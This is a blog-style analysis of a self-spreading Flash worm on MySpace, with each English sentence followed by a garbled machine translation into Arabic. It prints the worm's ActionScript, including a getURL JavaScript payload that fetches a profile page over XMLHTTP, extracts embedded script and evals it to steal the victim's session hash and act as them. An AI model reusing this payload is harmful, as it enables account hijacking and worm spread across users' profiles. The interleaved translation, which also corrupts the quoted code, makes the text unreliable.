MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. ميسباكي قد اصيبوا بالعدوى عن طريق فلاش القائم (فرنك سويسري) الدوده التي تنتشر بسرعة من خلال ميسباكي. It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec ومن تضمين قانون جافا سكريبت الى المستخدمين لمحات عن ان يعيد توجيه الزوار الى موقع تدعي حكومة الولايات المتحدة كانت وراء 9 / 11 الهجمات الارهابيه ، Symantec warned محذر Monday. الاثنين. However it may be just the tip of the iceberg. ومع ذلك قد يكون مجرد غيض من فيض. Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads. دعونا نلقي نظرة على كيفية عمله على فهم الكيفيه التى يمكن تعديلها بسهولة لتقديم الكثير من الحمولات المدمره.

The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. فان لم تذكر اسماءهم ليست دودة خبيثة ولكن Shockwave فلاش). فرنك سويسري) التي تحتوي على ملف الحموله يضمن جافا سكريبت الى صورة ميسباكي اي مستخدم من آراء. ملف فرنك سويسري. This can easily replicate هذا ويمكن بسهولة تكرار Samy is my friend سامي هو صديقي worm without breaking a sweat. دودة دون كسر العرق.

This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously). هذا جافا سكريبت المدونه بعد ذلك ان تفسر من جانب اي من المستخدم بزياره الموقع ، مما يسمح البيانات الحساسة لتكون مسروقه ، مثل بعثرة القيمه المطلوبة لتنفيذ هذه العمليات على النحو المستخدم ، وأداء العمليات نيابة عن ان المستخدمين (دون الحصول على موافقة من الواضح). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site. وفي الوقت الراهن ، ان الوصول تستخدم فقط لنشر مدونة جافا سكريبت لمحات أخرى على موقع شبكة اجتماعية شعبية.

If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content. اذا كانت الحموله هي خبيثة ، يمكن لها ان تضطلع الثانويه مثل الهجمات التى تستهدف مواطن الضعف التي كشف عنها مؤخرا والتي تؤثر على مايكروسوفت اوفيس المحتوى. The impact would be much higher exposing even sensitive information on your hard-disk. اثر ستكون اعلى بكثير حتى تعريض المعلومات الحساسة الخاصة بك على القرص الصلب.

Let’s take a look at the worm, thanks to research by دعونا نلقي نظرة على الدوده ، وذلك بفضل البحوث التي اجرتها kinematic.theory :

When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript: عندما تقوم بزياره الصفحه المصابين به بالفعل ، ثمة فلاش جزءا لا يتجزأ من وجوه ( "redirect.swf") التي تتضمن actionscript :
getURL(" geturl ( " url موقع “); ") ؛

It opens and redirects you to the specified blog URL. وتفتح ويعيد توجيه لكم بلوق الى موقع محدد.

On this blog url there is another flash file embedded - “retrievecookie.swf”. على هذا بلوق هناك موقع آخر جزءا لا يتجزأ من ملف فلاش -- "retrievecookie.swf". It contains: وهي تتضمن ما يلي :

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' geturl ( "javas \ n \ rcript : فار س = activexobject جديدة (\' msxml2.xmlhttp \ ') ؛ x.open (\' الحصول على \ '، \' http://editprofile.myspace.com/index.cfm؟ fuseaction = user.homecomments & friendid = 93634373 \ '، صحيح) ؛ x.onreadystatechange = الوظيفة () (اذا (x.readystate == 4) (فار pg = x.responsetext ؛ فار = pg.substring اللجنة الداءمه (pg.indexof) \ 'Bx - \') +3 ، pg.indexof (\ '- بحكم \')) ؛ في حين ان ((sc.indexof (\ '
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \ ')!=-1) | | (sc.indexof (\' - '30\')!=- 1)) (sc.indexof فار ع = (\ '
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ ') ؛ اذا كان (ن ==- 1) ع = sc.indexof (\' - '30\') ؛ اللجنة الداءمه sc.substring = (0 ، n) + sc.substring (ن +5 ، sc.length) ؛ ) ؛ "+" مييقتلا هدحو (اللجنة الداءمه)؛}}؛" + "x.send (لاغيه) ؛" ، "") ؛

It opens another blog post ( وتفتح آخر بلوق بوست) link رابط ) and evaluates its contents. (ويقيم محتوياتها.

This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace. هذه المدونه الخاص بك ميسباكي يحصل التشويش الذي يسمح لأي شخص للعمل معكم على المساحه الخاصة بي واداء اي عمليات نيابة عنك مثل تغيير كلمة السر الخاصة بك او اضافة شخص غير معروف كما رفيقك ، اي شيء يمكنك القيام به على المساحه الخاصة بي. Currently the code adds a message to your MySpace profile. وتضيف المدونه حاليا رسالة الى حسابك لمحة ميسباكي. It extensively use AJAX for its operations. اجاكس استخدام على نطاق واسع انها لعملياتها.